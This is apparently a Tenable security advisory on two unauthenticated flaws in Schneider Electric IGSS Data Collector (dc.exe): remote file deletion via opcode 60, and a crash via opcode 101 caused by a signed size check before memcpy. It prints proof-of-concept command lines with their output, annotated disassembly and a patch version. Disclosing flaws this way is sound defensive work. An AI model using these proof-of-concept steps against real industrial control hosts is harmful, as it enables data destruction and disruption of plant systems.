Synopsis
While researching ICSA-21-285-03 for Nessus plugin coverage, Tenable found multiple vulnerabilities in Schneider Electric IGSS Data Collector (dc.exe) v15.0.0.21301.
Unauthenticated Remote File Deletion
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L (6.5)
The IGSS Data Collector (dc.exe) does not check the user-supplied file to be deleted when handling opcode 60. An unauthenticated remote attacker knowing the IGSS project directory can exploit this to delete arbitrary files on the dc.exe host under the security context of the user account running dc.exe.
POC:
python3 igss_dc_opcode_60_file_deletion.py -t <target> -p 12397 -f 'C:\tmp\delete_me.txt' -d 'C:\ProgramData\Schneider Electric\IGSS32\V15.0\GssDemo\' Using IGSS project directory C:\ProgramData\Schneider Electric\IGSS32\V15.0\GssDemo\ This script attempts to delete C:\tmp\delete_me.txt on the remote target host provided the specified project directory is correct for the remote IGSS. If the specified project directory is incorrect, file deletion will fail. Please save a copy of the file and ensure a correct IGSS project directory before continuing the script. Press c/C to continue or any other key(s) to quit: c Sending a specially crafted message Please check if C:\tmp\delete_me.txt has been deleted on the target host
Unauthenticated Remote DoS
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H (5.9)
The IGSS Data Collector (dc.exe) does not properly check the user-supplied size of compressed data when handling opcode 101. dc.exe does a signed integer comparison for the check. A negative size will pass the check but that size will be treated as a very large positive integer later when it's passed to memcpy():
<...snip...> .text:0047EE69 mov ecx, [eax+1Ch] ; attacker-controlled size .text:0047EE6C mov [ebp+DataSize], ecx .text:0047EE72 mov edx, [ebp+var_2D8] .text:0047EE78 mov eax, [edx] .text:0047EE7A add eax, [ebp+DataSize] .text:0047EE80 cmp eax, 7534h .text:0047EE85 signed int comparison .text:0047EE85 0xffffffff (-1) would pass the size check .text:0047EE85 jle short ok_47EEF1 ; attacker-controlled size .text:0047EE85 ; (i.e., 0xffffffff) <...snip...> .text:0047EEF1 ok_47EEF1: ; CODE XREF: sn_receive_file+225↑j .text:0047EEF1 mov edx, [ebp+DataSize] ; attacker-controlled size .text:0047EEF1 ; (i.e., 0xffffffff) .text:0047EEF7 push edx ; Size .text:0047EEF8 mov eax, [ebp+arg_0] .text:0047EEFB add eax, 20h ; ' ' .text:0047EEFE push eax ; Src .text:0047EEFF mov ecx, [ebp+var_2D8] .text:0047EF05 mov edx, [ecx+14h] .text:0047EF08 mov eax, [ebp+var_2D8] .text:0047EF0E add edx, [eax] .text:0047EF10 push edx ; void * .text:0047EF11 call memcpy <...snip...>
An unauthenticated remote attacker knowing the IGSS project directory can exploit this to crash dc.exe, which restarts.
POC:
python3 igss_dc_opcode_101_dos.py -t <target> -p 12397 -d 'C:\ProgramData\Schneider Electric\IGSS32\V15.0\GssDemo\'
Using IGSS project directory C:\ProgramData\Schneider Electric\IGSS32\V15.0\GssDemo\
Note that if the specified project directory is incorrect
dc.exe will not be terminated.
Sending a specially crafted message
Traceback (most recent call last):
File "/work/0day/igss_dc_opcode_101_dos.py", line 64, in <module>
s.recv(1024)
ConnectionResetError: [Errno 104] Connection reset by peer
Solution
Users are advised to download and install version 15.0.0.21321 of the IGSS DC module, dc.exe, which includes fixes for these vulnerabilities. This version of the module can be downloaded at
https://igss.schneider-electric.com/igss/igssupdates/v150/IGSSUPDATE.ZIP.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team